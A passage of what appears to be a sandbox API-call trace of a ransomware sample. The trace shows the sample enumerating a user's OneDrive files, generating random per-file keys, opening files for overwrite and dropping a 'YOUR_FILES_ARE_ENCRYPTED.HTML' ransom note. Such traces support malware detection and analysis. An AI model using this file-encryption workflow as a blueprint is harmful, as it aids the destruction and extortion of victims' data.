NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.499] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0160.503] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3fe78d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3fe78d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3fe78d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x394a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncApi.dll", cAlternateFileName="FILESY~3.DLL")) returned 1 [0160.503] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll") returned 87 [0160.503] lstrcmpW (lpString1="FileSyncApi.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.503] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0160.503] lstrlenW (lpString=".dll") returned 4 [0160.503] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0160.503] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0160.503] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=234664) returned 1 [0160.503] GetProcessHeap () returned 0x270000 [0160.503] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x28150) returned 0x750a170 [0160.508] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A2") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="86") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="EF") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BE") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="52") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="24") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0F") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="65") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="4E") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="52") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="3F") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5F") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F8") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="FC") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="E4") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="78") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="CA") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="83") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="70") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0D") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="68") returned 2 [0160.509] wsprintfW 
(in: param_1=0x4ebd166, param_2="%02X" | out: param_1="BE") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9D") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="EF") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="DC") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="72") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="76") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="60") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="03") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="79") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="9F") returned 2 [0160.510] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="32") returned 2 [0160.510] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll" [0160.510] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.510] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0160.511] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa40a5fb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa40a5fb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa40a5fb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x16e6a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncClient.dll", cAlternateFileName="FILESY~4.DLL")) returned 1 [0160.511] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll") returned 90 [0160.511] lstrcmpW (lpString1="FileSyncClient.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.511] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0160.511] lstrlenW (lpString=".dll") returned 4 [0160.511] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0160.511] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncclient.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0160.512] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1500840) returned 1 [0160.512] GetProcessHeap () returned 0x270000 [0160.512] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0160.515] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A6") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7D") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="6D") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DC") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: 
param_1="19") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="25") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="8F") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="F6") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="91") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="85") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="EA") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="56") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="E9") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="3D") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="7E") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6A") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="3B") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="42") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="26") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="7B") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D6") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="86") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="CF") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="93") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="39") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="69") returned 2 [0160.516] wsprintfW (in: 
param_1=0x4ebd17a, param_2="%02X" | out: param_1="96") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="B7") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="F0") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="9C") returned 2 [0160.517] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="5A") returned 2 [0160.517] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7F") returned 2 [0160.517] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll" [0160.517] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.517] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0160.517] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4164690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4164690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4164690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1b8a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncConfig.exe", cAlternateFileName="FILESY~1.EXE")) returned 1 [0160.517] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncConfig.exe") returned 90 [0160.517] 
lstrcmpW (lpString1="FileSyncConfig.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.517] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0160.517] lstrlenW (lpString=".exe") returned 4 [0160.517] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0160.518] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa41b0950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa41b0950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa41b0950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12f0a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncSessions.dll", cAlternateFileName="FIFC38~1.DLL")) returned 1 [0160.518] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll") returned 92 [0160.518] lstrcmpW (lpString1="FileSyncSessions.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.518] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0160.518] lstrlenW (lpString=".dll") returned 4 [0160.518] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0160.518] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncsessions.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0160.518] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: 
lpFileSize=0x4ebd1f8*=1241256) returned 1 [0160.518] GetProcessHeap () returned 0x270000 [0160.518] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0160.522] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="8E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="8C") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="4E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="2C") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="6E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="7E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="95") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="49") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="E3") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="16") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="04") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="97") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BA") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="69") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="2B") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="1C") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="D5") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="F8") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="42") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: 
param_1="7F") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="3A") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="24") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="06") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="72") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CC") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="03") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="EF") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="5B") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="6A") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="59") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="69") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="30") returned 2 [0160.524] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll" [0160.524] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.524] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0160.524] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xa426f030, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa426f030, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa426f030, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x506a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncShell.dll", cAlternateFileName="FI340C~1.DLL")) returned 1 [0160.524] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncShell.dll") returned 89 [0160.525] lstrcmpW (lpString1="FileSyncShell.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.525] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0160.525] lstrlenW (lpString=".dll") returned 4 [0160.525] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0160.525] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncShell.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncshell.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0160.525] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fr", cAlternateFileName="")) returned 1 [0160.525] wnsprintfW 
(in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr") returned 74 [0160.525] GetProcessHeap () returned 0x270000 [0160.525] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.525] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr" [0160.525] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\*" [0160.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.527] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.527] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.527] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.527] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.527] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.527] lstrlenW (lpString=".mui") returned 4 [0160.527] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.527] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.527] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.527] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.528] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.530] CloseHandle (hObject=0x5bc) returned 1 [0160.530] GetProcessHeap () returned 0x270000 [0160.531] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.531] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ga-ie", cAlternateFileName="")) returned 1 [0160.531] wnsprintfW (in: 